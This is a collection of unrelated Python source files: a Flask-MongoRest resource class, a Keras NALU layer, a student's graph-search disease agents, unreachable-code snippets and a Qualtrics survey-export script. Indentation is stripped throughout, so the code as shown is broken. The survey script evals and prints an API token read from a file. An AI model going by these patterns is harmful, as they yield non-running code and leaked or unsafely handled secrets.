if request.headers.get("Transfer-Encoding") == "chunked":
raise ValidationError(
{"error": "Chunked Transfer-Encoding is not supported."}
)
try:
self._raw_data = json.loads(
request.data.decode("utf-8"),
parse_constant=self._enforce_strict_json,
)
except ValueError:
raise ValidationError(
{"error": "The request contains invalid JSON."}
)
if not isinstance(self._raw_data, dict):
raise ValidationError({"error": "JSON data must be a dict."})
else:
self._raw_data = {}
return self._raw_data
@classmethod
def uri(cls, path):
"""Generate a URI reference for the given path"""
if cls.uri_prefix:
ret = cls.uri_prefix + path
return ret
else:
raise ValueError(
"Cannot generate URI for resources that do not specify a uri_prefix"
)
@classmethod
def _url(cls, path):
"""Generate a complete URL for the given path. Requires application context."""
if cls.uri_prefix:
url = url_for(cls.uri_prefix.lstrip("/").rstrip("/"), _external=True)
ret = url + path
return ret
else:
raise ValueError(
"Cannot generate URL for resources that do not specify a uri_prefix"
)
def get_fields(self):
"""
Return a list of fields that should be included in the response
(unless a `_fields` param didn't include them).
"""
return self.fields
def get_optional_fields(self):
"""
Return a list of fields that can optionally be included in the
response (but only if a `_fields` param mentioned them explicitly).
"""
return []
def get_requested_fields(self, **kwargs):
"""
Process a list of fields requested by the client and return only the
ones which are allowed by get_fields and get_optional_fields.
If `_fields` param is set to '_all', return a list of all the fields
from get_fields and get_optional_fields combined.
"""
params = kwargs.get("params", None)
include_all = False
if "fields" in kwargs:
fields = kwargs["fields"]
all_fields_set = set(fields)
else:
fields = self.get_fields()
all_fields_set = set(fields) | set(self.get_optional_fields())
if params and "_fields" in params:
only_fields = set(params["_fields"].split(","))
if "_all" in only_fields:
include_all = True
else:
only_fields = None
requested_fields = []
if include_all or only_fields is None:
if include_all:
field_selection = all_fields_set
else:
field_selection = fields
for field in field_selection:
requested_fields.append(field)
else:
for field in only_fields:
actual_field = self._reverse_rename_fields.get(field, field)
if actual_field in all_fields_set:
requested_fields.append(actual_field)
return requested_fields
def get_max_limit(self):
return self.max_limit
def get_related_resources(self):
return self.related_resources
def get_save_related_fields(self):
return self.save_related_fields
def get_rename_fields(self):
"""
@TODO should automatically support model_id for reference fields (only) and model for related_resources
"""
return self.rename_fields
def get_child_document_resources(self):
# By default, don't inherit child_document_resources. This lets us have
# multiple resources for a child document without having to reset the
# child_document_resources property in the subclass.
if "child_document_resources" in self.__class__.__dict__:
return self.child_document_resources
else:
return {}
def get_default_child_resource_document(self):
# See comment on get_child_document_resources.
if "default_child_resource_document" in self.__class__.__dict__:
return self.default_child_resource_document
else:
return None
def get_filters(self):
"""
Given the filters declared on this resource, return a mapping
of all allowed filters along with their individual mappings of
suffixes and operators.
For example, if self.filters declares:
{ 'date': [operators.Exact, operators.Gte] }
then this method will return:
{
'date': {
'': operators.Exact,
'exact': operators.Exact,
'gte': operators.Gte
}
}
Then, when a request comes in, Flask-MongoRest will match
`?date__gte=value` to the 'date' field and the 'gte' suffix: 'gte',
and hence use the Gte operator to filter the data.
"""
filters = {}
for field, operators in getattr(self, "filters", {}).items():
field_filters = {}
for op in operators:
if op.op == "exact":
field_filters[""] = op
field_filters[op.op] = op
filters[field] = field_filters
return filters
def serialize_field(self, obj, **kwargs):
if self.uri_prefix and hasattr(obj, "id"):
return self._url(str(obj.id))
else:
return self.serialize(obj, **kwargs)
def _subresource(self, obj):
"""
Select and create an appropriate sub-resource class for delegation or
return None if there isn't one.
"""
s_class = self._child_document_resources.get(obj.__class__)
if not s_class and self._default_child_resource_document:
s_class = self._child_document_resources[
self._default_child_resource_document
]
if s_class and s_class != self.__class__:
r = s_class(view_method=self.view_method)
r.data = self.data
return r
else:
return None
def get_field_value(self, obj, field_name, field_instance=None, **kwargs):
"""Return a json-serializable field value.
field_name is the name of the field in `obj` to be serialized.
field_instance is a MongoEngine field definition.
**kwargs are just any options to be passed through to child resources serializers.
"""
has_field_instance = bool(field_instance)
field_instance = (
field_instance
or self.document._fields.get(field_name, None)
or getattr(self.document, field_name, None)
)
# Determine the field value
if has_field_instance:
field_value = obj
elif isinstance(obj, dict):
return obj[field_name]
else:
try:
field_value = getattr(obj, field_name)
except AttributeError:
raise UnknownFieldError
return self.serialize_field_value(
obj, field_name, field_instance, field_value, **kwargs
)
def serialize_field_value(
self, obj, field_name, field_instance, field_value, **kwargs
):
"""Select and delegate to an appropriate serializer method based on type of field instance.
field_value is an actual value to be serialized.
For other fields, see get_field_value method.
"""
if isinstance(
field_instance,
(ReferenceField, GenericReferenceField, EmbeddedDocumentField),
):
return self.serialize_document_field(field_name, field_value, **kwargs)
elif isinstance(field_instance, ListField):
return self.serialize_list_field(
field_instance, field_name, field_value, **kwargs
)
elif isinstance(field_instance, DictField):
return self.serialize_dict_field(
field_instance, field_name, field_value, **kwargs
)
elif callable(field_instance):
return self.serialize_callable_field(
obj, field_instance, field_name, field_value, **kwargs
)
return field_value
def serialize_callable_field(
self, obj, field_instance, field_name, field_value, **kwargs
):
"""Execute a callable field and return it or serialize
it based on its related resource defined in the `related_resources` map.
"""
if isinstance(field_value, list):
value = field_value
else:
if isbound(field_instance):
value = field_instance()
elif isbound(field_value):
value = field_value()
else:
value = field_instance(obj)
if field_name in self._related_resources:
if isinstance(value, list):
return [
self._related_resources[field_name]().serialize_field(o, **kwargs)
for o in value
]
elif value is None:
return None
else:
return self._related_resources[field_name]().serialize_field(
value, **kwargs
)
return value
def serialize_dict_field(self, field_instance, field_name, field_value, **kwargs):
"""Serialize each value based on an explicit field type
(e.g. if the schema defines a DictField(IntField), where all
the values in the dict should be ints).
"""
if field_instance.field:
return {
key: self.get_field_value(
elem, field_name, field_instance=field_instance.field, **kwargs
)
for (key, elem) in field_value.items()
}
# ... or simply return the dict intact, if the field type
# wasn't specified
else:
return field_value
def serialize_list_field(self, field_instance, field_name, field_value, **kwargs):
"""Serialize each item in the list separately."""
return [
val
for val in [
self.get_field_value(
elem, field_name, field_instance=field_instance.field, **kwargs
)
for elem in field_value
]
if val
]
def serialize_document_field(self, field_name, field_value, **kwargs):
"""If this field is a reference or an embedded document, either return
a DBRef or serialize it using a resource found in `related_resources`.
"""
if field_name in self._related_resources:
return (
field_value
and not isinstance(field_value, DBRef)
and self._related_resources[field_name]().serialize_field(
field_value, **kwargs
)
)
else:
if DocumentProxy and isinstance(field_value, DocumentProxy):
# Don't perform a DBRef isinstance check below since
# it might trigger an extra query.
return field_value.to_dbref()
if isinstance(field_value, DBRef):
return field_value
return field_value and field_value.to_dbref()
def serialize(self, obj, **kwargs):
"""
Given an object, serialize it, turning it into its JSON
representation.
"""
if not obj:
return {}
# If a subclass of an obj has been called with a base class' resource,
# use the subclass-specific serialization
subresource = self._subresource(obj)
if subresource:
return subresource.serialize(obj, **kwargs)
# Get the requested fields
requested_fields = self.get_requested_fields(**kwargs)
# Drop the kwargs we don't need any more (we're passing `kwargs` to
# child resources so we don't want to pass `fields` and `params` that
# pertain to the parent resource).
kwargs.pop("fields", None)
kwargs.pop("params", None)
# Fill in the `data` dict by serializing each of the requested fields
# one by one.
data = {}
for field in requested_fields:
# resolve the user-facing name of the field
renamed_field = self._rename_fields.get(field, field)
# if the field is callable, execute it with `obj` as the param
if hasattr(self, field) and callable(getattr(self, field)):
value = getattr(self, field)(obj)
# if the field is associated with a specific resource (via the
# `related_resources` map), use that resource to serialize it
if field in self._related_resources and value is not None:
related_resource = self._related_resources[field]()
if isinstance(value, mongoengine.document.Document):
value = related_resource.serialize_field(value)
elif isinstance(value, dict):
value = {
k: related_resource.serialize_field(v)
for (k, v) in value.items()
}
else: # assume queryset or list
value = [related_resource.serialize_field(o) for o in value]
data[renamed_field] = value
else:
try:
data[renamed_field] = self.get_field_value(obj, field, **kwargs)
except UnknownFieldError:
with contextlib.suppress(UnknownFieldError):
data[renamed_field] = self.value_for_field(obj, field)
return data
def handle_serialization_error(self, exc, obj):
"""
Override this to implement custom behavior whenever serializing an
object fails.
"""
pass
def value_for_field(self, obj, field):
"""
If we specify a field which doesn't exist on the resource or on the
object, this method lets us return a custom value.
"""
raise UnknownFieldError
def validate_request(self, obj=None):
"""
Validate the request that's currently being processed and fill in
the self.data dict that'll later be used to save/update an object.
`obj` points to the object that's being updated, or is empty if a new
object is being created.
"""
# When creating or updating a single object, delegate the validation
# to a more specific subresource, if it exists
if (request.method == "PUT" and obj) or request.method == "POST":
subresource = self._subresource(obj)
if subresource:
subresource._raw_data = self._raw_data
subresource.validate_request(obj=obj)
self.data = subresource.data
return
# Don't work on original raw data, we may reuse the resource for bulk
# updates.
self.data = self.raw_data.copy()
# Do renaming in two passes to prevent potential multiple renames
# depending on dict traversal order.
# E.g. if a -> b, b -> c, then a should never be renamed to c.
fields_to_delete = []
fields_to_update = {}
for k, v in self._rename_fields.items():
if v in self.data:
fields_to_update[k] = self.data[v]
fields_to_delete.append(v)
for k in fields_to_delete:
del self.data[k]
for k, v in fields_to_update.items():
self.data[k] = v
# If CleanCat schema exists on this resource, use it to perform the
# validation
if self.schema:
if request.method == "PUT" and obj is not None:
obj_data = {key: getattr(obj, key) for key in obj._fields.keys()}
else:
obj_data = None
schema = self.schema(self.data, obj_data)
try:
self.data = schema.full_clean()
except SchemaValidationError:
raise ValidationError(
{"field-errors": schema.field_errors, "errors": schema.errors}
)
def get_queryset(self):
"""
Return a MongoEngine queryset that will later be used to return
matching documents.
"""
return self.document.objects
def get_object(self, pk, qfilter=None):
"""
Given a PK and an optional queryset filter function, find a matching
document in the queryset.
"""
qs = self.get_queryset()
# If a queryset filter was provided, pass our current queryset in and
# get a new one out
if qfilter:
qs = qfilter(qs)
obj = qs.get(pk=pk)
# We don't need to fetch related resources for DELETE requests because
# those requests do not serialize the object (a successful DELETE
# simply returns a `{}`, at least by default). We still want to fetch
# related resources for GET and PUT.
if request.method != "DELETE":
self.fetch_related_resources(
[obj], self.get_requested_fields(params=self.params)
)
return obj
def fetch_related_resources(self, objs, only_fields=None):
"""
Given a list of objects and an optional list of the only fields we
should care about, fetch these objects' related resources.
"""
if not self.related_resources_hints:
return
# Create a map of field names to MongoEngine Q objects that will
# later be used to fetch the related resources from MongoDB
# Queries for the same document/collection are combined to improve
# efficiency.
document_queryset = {}
for obj in objs:
for field_name in self.related_resources_hints.keys():
if only_fields is not None and field_name not in only_fields:
continue
method = getattr(obj, field_name)
if callable(method):
q = method()
if field_name in document_queryset:
document_queryset[field_name] = (
document_queryset[field_name] | q._query_obj
)
else:
document_queryset[field_name] = q._query_obj
# For each field name, execute the queries we generated in the block
# above, and map the results to each object that references them.
# TODO This is in dire need of refactoring, or a complete overhaul
hints = {}
for field_name, q_obj in document_queryset.items():
doc = self.get_related_resources()[field_name].document
# Create a QuerySet based on the query object
query = doc.objects.filter(q_obj)
# Don't let MongoDB do the sorting as it won't use the index.
# Store the ordering so we can do client sorting afterwards.
ordering = query._ordering or query._get_order_by(
query._document._meta["ordering"]
)
query = query.order_by()
# Fetch the results
results = list(query)
# Reapply the ordering and add results to the mapping
if ordering:
document_queryset[field_name] = sorted(results, cmp_fields(ordering))
else:
document_queryset[field_name] = results
# For each field name, create a map of obj PKs to a list of
# results they referenced.
hint_index = {}
if field_name in self.related_resources_hints:
hint_field = self.related_resources_hints[field_name]
for obj in document_queryset[field_name]:
hint_field_instance = obj._fields[hint_field]
# Don't trigger a query for SafeReferenceFields
if SafeReferenceField and isinstance(
hint_field_instance, SafeReferenceField
):
hinted = obj._db_data[hint_field]
if hint_field_instance.dbref:
hinted = hinted.id
else:
hinted = str(getattr(obj, hint_field).id)
if hinted not in hint_index:
hint_index[hinted] = [obj]
else:
hint_index[hinted].append(obj)
hints[field_name] = hint_index
# Assign the results to each object
# TODO This is in dire need of refactoring, or a complete overhaul
for obj in objs:
for field_name, hint_index in hints.items():
obj_id = obj.id
if isinstance(obj_id, DBRef):
obj_id = obj_id.id
elif isinstance(obj_id, ObjectId):
obj_id = str(obj_id)
if obj_id not in hint_index:
setattr(obj, field_name, [])
else:
setattr(obj, field_name, hint_index[obj_id])
def apply_filters(self, qs, params=None):
"""
Given this resource's filters, and the params of the request that's
currently being processed, apply additional filtering to the queryset
and return it.
"""
if params is None:
params = self.params
for key, value in params.items():
# If this is a resource identified by a URI, we need
# to extract the object id at this point since
# MongoEngine only understands the object id
if self.uri_prefix:
url = urlparse(value)
uri = url.path
value = uri.lstrip(self.uri_prefix)
# special handling of empty / null params
# http://werkzeug.pocoo.org/docs/0.9/utils/ url_decode returns '' for empty params
if value == "":
value = None
elif value in ['""', "''"]:
value = ""
negate = False
op_name = ""
parts = key.split("__")
for i in range(len(parts) + 1, 0, -1):
field = "__".join(parts[:i])
allowed_operators = self._filters.get(field)
if allowed_operators:
parts = parts[i:]
break
if allowed_operators is None:
continue
if parts:
# either an operator or a query lookup! See what's allowed.
op_name = parts[-1]
if op_name in allowed_operators:
# operator; drop it
parts.pop()
else:
# assume it's part of a lookup
op_name = ""
if parts and parts[-1] == "not":
negate = True
parts.pop()
operator = allowed_operators.get(op_name, None)
if operator is None:
continue
if negate and not operator.allow_negation:
continue
if parts:
field = f"{field}__{'__'.join(parts)}"
field = self._reverse_rename_fields.get(field, field)
qs = operator().apply(qs, field, value, negate)
return qs
def apply_ordering(self, qs, params=None):
"""
Given this resource's allowed_ordering, and the params of the request
that's currently being processed, apply ordering to the queryset
and return it.
"""
if params is None:
params = self.params
if self.allowed_ordering and params.get("_order_by") in self.allowed_ordering:
order_params = [
self._reverse_rename_fields.get(p, p)
for p in params["_order_by"].split(",")
]
qs = qs.order_by(*order_params)
return qs
def get_skip_and_limit(self, params=None):
"""
Perform validation and return sanitized values for _skip and _limit
params of the request that's currently being processed.
"""
max_limit = self.get_max_limit()
if params is None:
params = self.params
if self.paginate:
# _limit and _skip validation
if not isint(params.get("_limit", 1)):
raise ValidationError(
{
"error": '_limit must be an integer (got "{}" instead).'.format(
params["_limit"]
)
}
)
if not isint(params.get("_skip", 1)):
raise ValidationError(
{
"error": '_skip must be an integer (got "{}" instead).'.format(
params["_skip"]
)
}
)
if params.get("_limit") and int(params["_limit"]) > max_limit:
raise ValidationError(
{
"error": f"The limit you set is larger than the maximum limit for this resource (max_limit = {max_limit})."
}
)
if params.get("_skip") and int(params["_skip"]) < 0:
raise ValidationError(
{
"error": '_skip must be a non-negative integer (got "{}" instead).'.format(
params["_skip"]
)
}
)
limit = min(int(params.get("_limit", self.default_limit)), max_limit)
# Fetch one more so we know if there are more results.
return int(params.get("_skip", 0)), limit
else:
return 0, max_limit
def get_objects(self, qs=None, qfilter=None):
"""
Return objects fetched from the database based on all the parameters
of the request that's currently being processed.
Params:
- Custom queryset can be passed via `qs`. Otherwise `self.get_queryset`
is used.
- Pass `qfilter` function to modify the queryset.
"""
params = self.params
custom_qs = True
if qs is None:
custom_qs = False
qs = self.get_queryset()
# If a queryset filter was provided, pass our current queryset in and
# get a new one out
if qfilter:
qs = qfilter(qs)
# Apply filters and ordering, based on the params supplied by the
# request
qs = self.apply_filters(qs, params)
qs = self.apply_ordering(qs, params)
# Apply limit and skip to the queryset
limit = None
if self.view_method == methods.BulkUpdate:
# limit the number of objects that can be bulk-updated at a time
qs = qs.limit(self.bulk_update_limit)
elif not custom_qs:
# no need to skip/limit if a custom `qs` was provided
skip, limit = self.get_skip_and_limit(params)
qs = qs.skip(skip).limit(limit + 1)
# Needs to be at the end as it returns a list, not a queryset
if self.select_related:
qs = qs.select_related()
# Evaluate the queryset
objs = list(qs)
# Raise a validation error if bulk update would result in more than
# bulk_update_limit updates
if (
self.view_method == methods.BulkUpdate
and len(objs) >= self.bulk_update_limit
):
raise ValidationError(
{
"errors": [
f"It's not allowed to update more than {self.bulk_update_limit} objects at once"
]
}
)
# Determine the value of has_more
if self.view_method != methods.BulkUpdate and self.paginate:
has_more = len(objs) > limit
if has_more:
objs = objs[:-1]
else:
has_more = None
# bulk-fetch related resources for moar speed
self.fetch_related_resources(objs, self.get_requested_fields(params=params))
return objs, has_more
def save_related_objects(self, obj, parent_resources=None):
if not parent_resources:
parent_resources = [self]
else:
parent_resources += [self]
if self._dirty_fields:
for field_name in set(self._dirty_fields) & set(
self.get_save_related_fields()
):
try:
related_resource = self.get_related_resources()[field_name]
except KeyError:
related_resource = None
field_instance = getattr(self.document, field_name)
# If it's a ReferenceField, just save it.
if isinstance(field_instance, ReferenceField):
instance = getattr(obj, field_name)
if instance:
if related_resource:
related_resource().save_object(
instance, parent_resources=parent_resources
)
else:
instance.save()
# If it's a ListField(ReferenceField), save all instances.
if isinstance(field_instance, ListField) and isinstance(
field_instance.field, ReferenceField
):
instance_list = getattr(obj, field_name)
for instance in instance_list:
if related_resource:
related_resource().save_object(
instance, parent_resources=parent_resources
)
else:
instance.save()
def save_object(self, obj, **kwargs):
self.save_related_objects(obj, **kwargs)
obj.save()
obj.reload()
self._dirty_fields = None # No longer dirty.
def get_object_dict(self, data=None, update=False):
if data is None:
data = {}
data = self.data or data
filter_fields = set(self.document._fields.keys())
if update:
# We want to update only the fields that appear in the request data
# rather than re-updating all the document's existing/other fields.
filter_fields &= {
self._reverse_rename_fields.get(field, field)
for field in self.raw_data.keys()
}
update_dict = {
field: value for field, value in data.items() if field in filter_fields
}
return update_dict
def create_object(self, data=None, save=True, parent_resources=None):
update_dict = self.get_object_dict(data)
obj = self.document(**update_dict)
self._dirty_fields = update_dict.keys()
if save:
self.save_object(obj)
return obj
def update_object(self, obj, data=None, save=True, parent_resources=None):
subresource = self._subresource(obj)
if subresource:
return subresource.update_object(
obj, data=data, save=save, parent_resources=parent_resources
)
update_dict = self.get_object_dict(data, update=True)
self._dirty_fields = []
for field, value in update_dict.items():
update = False
# If we're comparing reference fields, only compare ids without
# hitting the database
if hasattr(obj, "_db_data") and isinstance(
obj._fields.get(field), ReferenceField
):
db_val = obj._db_data.get(field)
id_from_obj = db_val and getattr(db_val, "id", db_val)
id_from_data = value and getattr(value, "pk", value)
if id_from_obj != id_from_data:
update = True
elif not equal(getattr(obj, field), value):
update = True
if update:
setattr(obj, field, value)
self._dirty_fields.append(field)
if save:
self.save_object(obj)
return obj
def delete_object(self, obj, parent_resources=None):
obj.delete()
|
from keras.engine import Layer
from keras.engine import InputSpec
from keras import initializers
from keras import regularizers
from keras import constraints
from keras import backend as K
from keras.utils.generic_utils import get_custom_objects
class NALU(Layer):
def __init__(self, units,
use_gating=True,
kernel_W_initializer='glorot_uniform',
kernel_M_initializer='glorot_uniform',
gate_initializer='glorot_uniform',
kernel_W_regularizer=None,
kernel_M_regularizer=None,
gate_regularizer=None,
kernel_W_constraint=None,
kernel_M_constraint=None,
gate_constraint=None,
epsilon=1e-7,
**kwargs):
"""
Neural Arithmatic and Logical Unit.
# Arguments:
units: Output dimension.
use_gating: Bool, determines whether to use the gating
mechanism between W and m.
kernel_W_initializer: Initializer for `W` weights.
kernel_M_initializer: Initializer for `M` weights.
gate_initializer: Initializer for gate `G` weights.
kernel_W_regularizer: Regularizer for `W` weights.
kernel_M_regularizer: Regularizer for `M` weights.
gate_regularizer: Regularizer for gate `G` weights.
kernel_W_constraint: Constraints on `W` weights.
kernel_M_constraint: Constraints on `M` weights.
gate_constraint: Constraints on gate `G` weights.
epsilon: Small factor to prevent log 0.
# Reference:
- [Neural Arithmetic Logic Units](https://arxiv.org/abs/1808.00508)
"""
super(NALU, self).__init__()
self.units = units
self.use_gating = use_gating
self.epsilon = epsilon
self.kernel_W_initializer = initializers.get(kernel_W_initializer)
self.kernel_M_initializer = initializers.get(kernel_M_initializer)
self.gate_initializer = initializers.get(gate_initializer)
self.kernel_W_regularizer = regularizers.get(kernel_W_regularizer)
self.kernel_M_regularizer = regularizers.get(kernel_M_regularizer)
self.gate_regularizer = regularizers.get(gate_regularizer)
self.kernel_W_constraint = constraints.get(kernel_W_constraint)
self.kernel_M_constraint = constraints.get(kernel_M_constraint)
self.gate_constraint = constraints.get(gate_constraint)
self.supports_masking = True
def build(self, input_shape):
assert len(input_shape) >= 2
input_dim = input_shape[-1]
self.W_hat = self.add_weight(shape=(input_dim, self.units),
name='W_hat',
initializer=self.kernel_W_initializer,
regularizer=self.kernel_W_regularizer,
constraint=self.kernel_W_constraint)
self.M_hat = self.add_weight(shape=(input_dim, self.units),
name='M_hat',
initializer=self.kernel_M_initializer,
regularizer=self.kernel_M_regularizer,
constraint=self.kernel_M_constraint)
if self.use_gating:
self.G = self.add_weight(shape=(input_dim, self.units),
name='G',
initializer=self.gate_initializer,
regularizer=self.gate_regularizer,
constraint=self.gate_constraint)
else:
self.G = None
self.input_spec = InputSpec(min_ndim=2, axes={-1: input_dim})
self.built = True
def call(self, inputs, **kwargs):
W = K.tanh(self.W_hat) * K.sigmoid(self.M_hat)
m = K.exp(K.dot(K.log(K.abs(inputs) + self.epsilon), W))
a = K.dot(inputs, W)
if self.use_gating:
g = K.sigmoid(K.dot(inputs, self.G))
outputs = g * a + (1. - g) * m
else:
outputs = a + m
return outputs
def compute_output_shape(self, input_shape):
assert input_shape and len(input_shape) >= 2
assert input_shape[-1]
output_shape = list(input_shape)
output_shape[-1] = self.units
return tuple(output_shape)
def get_config(self):
config = {
'units': self.units,
'use_gating': self.use_gating,
'kernel_W_initializer': initializers.serialize(self.kernel_W_initializer),
'kernel_M_initializer': initializers.serialize(self.kernel_M_initializer),
'gate_initializer': initializers.serialize(self.gate_initializer),
'kernel_W_regularizer': regularizers.serialize(self.kernel_W_regularizer),
'kernel_M_regularizer': regularizers.serialize(self.kernel_M_regularizer),
'gate_regularizer': regularizers.serialize(self.gate_regularizer),
'kernel_W_constraint': constraints.serialize(self.kernel_W_constraint),
'kernel_M_constraint': constraints.serialize(self.kernel_M_constraint),
'gate_constraint': constraints.serialize(self.gate_constraint),
'epsilon': self.epsilon
}
base_config = super(NALU, self).get_config()
return dict(list(base_config.items()) + list(config.items()))
get_custom_objects().update({'NALU': NALU})
|
""" File name: health_agents.py
Author: Jeff Yuanbo Han (u6617017)
Date: 8 March 2018
Description: This file contains agents which fight disease. It is used
in Exercise 4 of Assignment 0.
"""
import random
class HealthAgent:
""" A simple disease fighting agent. """
def __init__(self, locations, conn):
""" This constructor does nothing except save the locations and conn.
Feel free to overwrite it when you extend this class if you want
to do some initial computation.
(HealthAgent, [str], { str : set([str]) }) -> None
"""
self.locations = locations
self.conn = conn
def choose_move(self, location, valid_moves, disease, threshold, growth, spread):
""" Using given information, return a valid move from valid_moves.
Returning an invalid move will cause the system to stop.
Changing any of the mutable parameters will have no effect on the operation
of the system.
This agent will locally move to the highest disease, of there is
is no nearby disease, it will act randomly.
(HealthAgent, str, [str], [str], { str : float }, float, float, float) -> str
"""
max_disease = None
max_move = None
for move in valid_moves:
if max_disease is None or disease[move] > max_disease:
max_disease = disease[move]
max_move = move
if not max_disease:
return random.choice(valid_moves)
return max_move
# Make a new agent here called SmartHealthAgent, which extends HealthAgent and
# acts a bit more sensibly. Feel free to add other helper functions if needed.
class SmartHealthAgent(HealthAgent):
""" A smart disease fighting agent. This agent will move one step along a shortest path
to somewhere. That path has the highest priority of all shortest path to reachable locations.
It is accomplished in 3 steps:
1. For each reachable places, find by Uniform Cost Search a shortest path from location to it.
2. Compute the severity of each node, and then compute the priority of each path obtained in 1.
3. Move one step along a path with the highest priority.
See more details for step-1 in uc_search method, and for step-2 and 3 in choose_move method.
"""
def __init__(self, locations, conn):
""" Save the locations and conn as HealthAgent do.
(HealthAgent, [str], { str : set([str]) }) -> None
"""
super().__init__(locations, conn)
def choose_move(self, location, valid_moves, disease, threshold, growth, spread):
""" First, derive the distance as well as a shortest path from location to each reachable node,
by the method of Uniform Cost Search Algorithm. Then compute related statistics (defined
below). Finally, move one step along a path with the highest priority.
Define a statistic for each node called "severity":
severity[loc] = disease[loc] * len(conn[loc]), if disease[loc] < threshold;
disease[loc] ** 2 / threshold * len(conn[loc]), otherwise.
severity(loc) depicts very well how serious the pandemic is in loc.
Two essential features are reflected:
1. It is much more serious when disease[loc] >= threshold, because it spreads to its neighbors.
2. The potential threat to neighbors is counted in by multiplying len(conn[loc]).
For example, a location with 3 neighbors is intuitively more serious than another of the
same disease level but with 2 neighbors.
Define the "priority" of a road (a path from location to somewhere) as:
priority[road] = sum([severity[loc] for node in road]) / dist(road_target),
where road_target is the final destination of this road.
This to some extent reflects the average severity of nodes in a path.
Based on discussions above, all that we need now is moving one step along a path with the
highest priority.
(SmartHealthAgent, str, [str], [str], {str: float}, float, float, float) -> str
"""
from operator import itemgetter
move = None
# Find the distance as well as a shortest path from location to each reachable node.
dist, path = self.uc_search(location)
# Compute severity for each nodes.
severity = {}
for loc in self.locations:
if disease[loc] < threshold:
severity[loc] = disease[loc] * len(self.conn[loc])
else:
severity[loc] = disease[loc] ** 2 / threshold * len(self.conn[loc])
# Compute priority for each shortest path.
priority = {location: severity[location]}
for target in path:
priority[target] = sum([severity[node] for node in path[target]]) / dist[target]
# Move one step along a path with the highest priority.
ranking = sorted(priority.items(), key=itemgetter(1), reverse=True)
ranked_targets = [x[0] for x in ranking]
for target in ranked_targets:
if target == location:
move = location
break
else:
move = path[target][1]
break
# If there is no reachable node at all, just hopelessly move in random.
if not move:
return random.choice(valid_moves)
return move
def uc_search(self, location):
""" Call: dist, path = self.uc_search(location)
Compute the distances from location to any other place in self.locations
by Uniform Cost Search. (We shall call each of the locations a node.)
The distance to an unreachable node is set as inf (i.e. math.inf).
The output is
dist: { "X" : the shortest distance from location to X }
path: { "X" : [a shortest path from location to X] }
where X goes through all nodes in self.locations.
However in path, X must be reachable (i.e. dist[X] < inf).
(SmartHealthAgent, str) -> {str: num}, {str: [str]}
"""
from math import inf
# Restore [self.locations] in a set {locations}, in case that the returned paths
# are determined by the order in [self.locations].
locations = set(self.locations)
dist = dict((loc, inf) for loc in locations) # Initialize all distances as inf.
dist[location] = 0 # The distance is 0 from location to itself.
path = {}
current = location # The currently being-operated node, starting with location.
visited = set() # The set of nodes that have already been visited.
while len(visited) < len(locations):
visited.add(current)
# Check new connected nodes, and update the distance if it shortens.
for neighbor in self.conn[current]:
if dist[current] + 1 < dist[neighbor]:
dist[neighbor] = dist[current] + 1
path[neighbor] = [current] # Record the last node passed by.
# Choose a nearest unvisited node to operate for the next loop.
# This selection will be arbitrary if there exists more than one candidate,
# since {locations} is a set with no order.
candidate_dist = inf
for candidate in locations:
if candidate in visited: continue
if dist[candidate] < candidate_dist:
candidate_dist = dist[candidate]
current = candidate
# No candidates? Because all remaining nodes are isolated! Must break.
if current in visited: break
# Connect all the passing-by nodes to obtain complete paths.
for target in path:
while path[target][-1] != location :
path[target].extend( path[ path[target][-1] ] )
# Invert the order and add the final destination to each path.
for target in path:
path[target].reverse()
path[target].append(target)
return dist, path
|
def main():
if False:
print(1)
def while_unreachable():
while False:
print(1)
print(2)
print(3)
def while_unreachable2():
print("Hello")
while False:
print(1)
print(2)
print(3)
else:
print(1)
def if_unreachable_condition():
print("World")
if 4 == 5 or 11 + 2 == 0:
print(1)
|
import requests
import zipfile
import json
import io, os
import sys
import re
import socket
import pandas as pd
import reverse_geocoder as rg
import numpy as np
from glob import glob
import argparse
import boto3
import shutil
def get_args_from_command_line():
"""Parse the command line arguments."""
parser = argparse.ArgumentParser()
parser.add_argument("--country_code", type=str,
default="US")
parser.add_argument("--surveyId", type=str)
parser.add_argument("--reject_bots", type=int, default=0)
parser.add_argument("--HITId", type=str, default=None)
parser.add_argument("--sam_API", type=int)
parser.add_argument("--discard_x", type=int, default=3)
parser.add_argument("--iteration_number", type=str)
args = parser.parse_args()
return args
def exportSurvey(apiToken, surveyId, dataCenter, fileFormat, path_to_data):
surveyId = surveyId
fileFormat = fileFormat
dataCenter = dataCenter
# Setting static parameters
requestCheckProgress = 0.0
progressStatus = "inProgress"
baseUrl = "https://{0}.qualtrics.com/API/v3/responseexports/".format(dataCenter)
headers = {
"content-type": "application/json",
"x-api-token": apiToken,
}
# Step 1: Creating Data Export
downloadRequestUrl = baseUrl
downloadRequestPayload = '{"format":"' + fileFormat + '","surveyId":"' + surveyId + '"}'
downloadRequestResponse = requests.request("POST", downloadRequestUrl, data=downloadRequestPayload, headers=headers)
progressId = downloadRequestResponse.json()["result"]['id']
print(downloadRequestResponse.text)
# Step 2: Checking on Data Export Progress and waiting until export is ready
while progressStatus != "complete" and progressStatus != "failed":
print("progressStatus=", progressStatus)
requestCheckUrl = baseUrl + progressId
requestCheckResponse = requests.request("GET", requestCheckUrl, headers=headers)
requestCheckProgress = requestCheckResponse.json()["result"]["percentComplete"]
print("Download is " + str(requestCheckProgress) + " complete")
progressStatus = requestCheckResponse.json()["result"]["status"]
# step 2.1: Check for error
if progressStatus is "failed":
raise Exception("export failed")
# # Step 3: Downloading file
requestDownloadUrl = baseUrl + progressId + '/file'
requestDownload = requests.request("GET", requestDownloadUrl, headers=headers, stream=True)
# Step 4: Unzipping the file
zipfile.ZipFile(io.BytesIO(requestDownload.content)).extractall(
os.path.join(path_to_data, surveyId))
print('Complete')
def fill_assignment_worker_ids_dict(assignments_dict, assignment_worker_ids_dict):
for assignment_nb in range(len(assignments_dict['Assignments'])):
assignment_info_dict = assignments_dict['Assignments'][assignment_nb]
assignment_worker_ids_dict[assignment_info_dict['WorkerId']] = assignment_info_dict['AssignmentId']
return assignment_worker_ids_dict
if __name__ == "__main__":
args = get_args_from_command_line()
path_to_data = f'/scratch/mt4493/twitter_labor/twitter-labor-data/data/qualtrics/{args.country_code}/iter{args.iteration_number}/labeling'
if args.sam_API == 1:
with open('/scratch/spf248/twitter/data/keys/qualtrics/apiToken', 'r') as f:
apiToken = eval(f.readline())
else:
with open('/scratch/mt4493/twitter_labor/twitter-labor-data/data/keys/qualtrics/apiToken.txt', 'r') as f:
apiToken = f.readline()
print(apiToken)
# Export Survey
if os.path.exists(
os.path.join(path_to_data, args.surveyId)):
print("Overwriting existing folder")
